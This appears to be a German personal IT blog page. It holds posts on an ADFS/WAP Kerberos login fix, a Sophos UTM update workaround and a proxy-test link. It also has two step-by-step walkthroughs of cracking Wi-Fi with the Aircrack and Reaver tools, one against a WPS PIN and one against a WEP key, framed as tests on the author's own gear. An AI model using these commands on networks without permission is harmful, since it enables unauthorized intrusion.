5ain7 ga11 . CH || i7-l3ak5. CH || g07r007.CH

Security

ADFS / WAP and Exchange 2010 OWA Problem mit Kerberos (0x8007052e)

by on Apr.02, 2015, under ADFS, Exchange 2010, Exchange 2013, Exchange Server, Knowledgebase, Security, Server-Plattformen, Windows Server 2012 R2

Ich hatte das Problem, dass sich die User via Outlook Webapp (published via ADFS & WAP) nicht formularbasiert anmelden konnten. EAS und Konsorten funktionierten einwandfrei.

Nach dem Login auf dem neuen ADFS Page, passierte einfach nichts…

URL

 

Auf dem WAP Server sieht man, dass ein Kerberos Ticket angefordert wird, der ADFS Server aber kein Ticket zurücksenden kann. Die Logs auf dem WAP Server zeigten folgendes:

WAPLog

 

 

EVENT ID 12027, Username and Password wrong (0x8007052e).

 

Auf dem ADFS Server sieht man folgendes:

ADFSLOG

 

<364:

Encountered error during federation passive request.
Additional Data
Protocol Name:
Relying Party:
Exception details:
Microsoft.IdentityServer.Web.InvalidScopeException: 06a7aa66-3aad-e311-80c1-005056983900

 at Microsoft.IdentityServer.Web.Protocols.MSISHttp.MSISHttpProtocolHandler.ValidateSignInContext(MSISHttpSignInRequestContext msisContext, WrappedHttpListenerRequest request)

 at Microsoft.IdentityServer.Web.Protocols.MSISHttp.MSISHttpProtocolHandler.CreateProtocolContext(WrappedHttpListenerRequest request)

 at Microsoft.IdentityServer.Web.PassiveProtocolListener.GetProtocolHandler(WrappedHttpListenerRequest request, ProtocolContext& protocolContext, PassiveProtocolHandler& protocolHandler)

 at Microsoft.IdentityServer.Web.PassiveProtocolListener.OnGetContext(WrappedHttpListenerContext context)
>

Das Problem lag daran, dass der WAP-Server keine Berechtigung hatte Kerberos-Sicherheitstokens anzufordern. 

Nachdem ich den WAP Server in die Gruppe <Windows Authorization Access Group>
hinzugefügt hatte, funktionierte es nach dem Reboot einwandfrei.

 gruppe




Windows Authorization Access Group
In the user account in Active Directory there is a computed token. This is a computed version of the same security token that is created when a user logs in. You only need to add users to this group for special software that requires this access
Leave a Comment more...

Sophos UTM – 9.2xx to 9.304 up2date fails

by on Mar.30, 2015, under Firewalls, Knowledgebase, Networking, Security

gefunden auf:

 

http://www.sophos.com/en-us/support/knowledgebase/121765.aspx

 

Issue

Updating between minor UTM version releases is failing

First seen in

Sophos UTM

Cause

All updates on the UTM are applied sequentially, for example 9.200 updates to 9.201 before updating to 9.202. Upgrading issues can arise when an upgrade path between two minor versions is offered for example 9.2 to 9.3. Dependant on the speed in which the updates are installed to your UTM, you may be left with two upgrade routes, one of which will be invalid. An example of this would be if your UTM has downloaded the upgrade file between 9.209 and 9.300 but never applied this update, the files would remain on your system. After a few weeks 9.209 to 9.210 may have been released creating a second path based on revision version rather than minor version. If you install this update the scripts will also try to install 9.209 – 9.300 which is no longer valid because you are already running on a more recent version.
(note – Since 9.211 was released, the upgrade package from 9.210 to 9.304 was removed.  You now need to upgrade from 9.210 to 9.211, and then to 9.304)

What To Do

  1. Log into the WebAdmin of your UTM and temporarily disable automatic updating
  2. Log into the UTM shell of the UTM and escalate your user rights to root
  3. Using the following commands remove the redundant packages from these locations.
    • # rm -rf /var/up2date/sys-install/*
    • # rm /var/up2date/sys/*
    • # rm /var/up2date/.queue/*
  4. Change your location to the /var/up2date/sys location
    • # cd /var/up2date/sys
  5. Download the correct update file available from the download server.  The example below works for 9.211 to 9.304
    • # wget http://download.astaro.com/UTM/v9/up2date/u2d-sys-9.211003-304009.tgz.gpg
  6. Run the installation using the command:
    • # auisys.plx
  7. Re-enable automatic updating on the UTM

If your UTM is using High Availability, you may also need to remove these same files from the slave node as well.  When remotely accessing an HA cluster you can move to the slave node through the command # ha_utils ssh and when prompted enter the passwords.  The same procedure as above can then be used to resolve the updating issues but with the difference that the update files need to be downloaded on the master, and then copied to the slave using SCP.  From the master, after you have run a wget of the up2date files,  run the command ‘hs’ to identify the ‘cluster IP’ of the Slave node which will either end with a 1 or 2 depending on which node is the Master.  The output will look similar to this:

<M> fw1:/root # hs
Current mode: CLUSTER MASTER with id 1 in state ACTIVE
— Nodes ———————————————————————–
MASTER: 1 node1 198.19.250.1 9.210020 ACTIVE since Sat Jan 24 17:40:43 2015
SLAVE: 2 Node2 198.19.250.2 9.210020 UP2DATE since Thu Jan 29 13:03:58 2015

Taking the slave’s IP run the SCP command below from the directory in which the up2date files you wish to copy to the slave are located.

scp u2d-sys-9.210020-304009.tgz.gpg loginuser@198.19.250.2:/home/login

Then enter the password for ‘Loginuser’ – Note that whilst the slave is in status ‘up2date’ no config changes are sync’d across, so if the shell passwords were changed after the problem happened, the slave will still be using the old password.

After the files are copied across, use the command ‘ha_utils ssh‘ to switch to the slave, then move the files copied from the master, to the up2date location as follows:

mv /home/login/u2d-sys-9.210020-304009.tgz.gpg /var/up2date/sys

Now you can run auisys.plx on the slave.

If you need more information or guidance, then please contact technical support.
Leave a Comment more...

Test if you are behind a proxy

by on Jun.19, 2014, under Firewalls, Knowledgebase, Networking, Security

nützliche Site, um zu testen, ob man sich hinter einem Proxy befindet.

http://www.lagado.com/proxy-test

 

 

Leave a Comment more...

WPS vs Reaver – per Knopfdruck….

by on Oct.27, 2013, under Knowledgebase, Networking, Router, Security

mit WLAN verbinden, einfach und schnell…so preisen es die Provider an. Genau so schnell kann man sich dies auch zunutzen machen. Ein WPA-Key zu bruteforcen ist grundsätzlich keine grosse Sache. Der Erfolg hängt natürlich von einer ordentlichen Wordlist ab. Je komplizierter der Key ist, desto länger dauert es, den Key zu knacken. Wäre da nicht das Feature WPS, dass die einfache, faule Anbindung von Devices anbietet. Der hart auserkorene WPA2 Key kann relativ schnell umgangen werden. Der WPS Key ist meist eine 6stellige Zahl..und darum leicht zu bruteforcen.und so geht es.

1. Backtrack starten, WLAN-Adapter in den Monitor-Mode versetzen.

<Airmon-ng Start wlan0>

 

2. mit wash checken, welche WLAN Router anfällig sind.

<wash -i mon0>

2wps

Der WLAP muss auf “WPS Locked NO” stehen.

3.  Mit Reaver den Key durchackern.

<reaver -i mon0 -b BSSID -vv -x 60>

Ich musste die Intervalle zwischen den Anfragen auf 60 Sekunden setzen, da das arme DLINK-Ding sonst schwer überfordert war und crashte.

4reav

Der Key war nach ca. 3h gefunden und der PSK wird gerade mitgegeben. Schnell und einfach per Knopfdruck mit den WLAN verbinden….:-)

 

Fazit zur Absicherung seines WLAN’s:

– KEIN WLAN betreiben:-) oder

– WPA Key bedacht wählen ( Sonderzeichen, keine ganzen im Duden findbare Wörter, möglichst viele Zeichen

– WPS Feature deaktivieren

– regelmässig die Firmware updaten

– MAC Access Liste ( eine Hürde mehr, aber meiner Meinung nach für die Füchse)

Leave a Comment more...

Backtrack vs. WEP Crack

by on Oct.25, 2013, under Knowledgebase, Security

Da ich meinen WEP Key meines uralten WLAPs vergessen/verloren hatte.-), wollte ich mal testen, wie einfach es ist, einem WEP Key zu cracken. Man muss kein Hacker-Meister sein dazu und ja..wer braucht schon noch WEP!!??

Die grösste Challenge dabei war, eine Backtrack 5R3-kompatible WLAN Karte zu finden.

Und so funzt es:

1. Das WLAN-Device in den Monitor Mode setzen:

<airmon-ng start wlanO>

Mon1

Das WLAN Device ist nun im Monitor Mode und muss mit MonO angesprochen werden.

 

2. neugierig Schauen, was alles für WLANs in der Nachbarschaft broadcasten:

<airodump-ng monO>

2airodump

3. Die Suche nach der BSSID und den Stations auf die gewünschte BSSID einschränken:

<airodump-ng -w Output -c channel –bssid BSSIDINPUT mon0>

3airodump

4. Neue Shellsession öffnen und anschliessend die verbundenen Stations zu einem disconnect und re-auth zwingen (fake auth)

<aireplay-ng -1 O -a BSSIDINPUT mon0>

4reauth

5. Neue Shellsession öffnen und anschliessend Verbindungspakete generieren (fake ARP Requests)

<aireplay-ng -3  -b BSSIDINPUT mon0>

5paketegener

6. Warten bis ein paar Pakete ausgetauscht wurden und anschliessend den Output analysieren.

<aircrack-ng Output-01.cap >

6Keyfound

PIC

et voila…fass es keinen Key findet, mehr Pakete abwarten.

 

fyi: Usage of the attacks => Aireplay

It currently implements multiple different attacks:

 

 

 

 

Leave a Comment more...

Blogroll

A few highly recommended websites...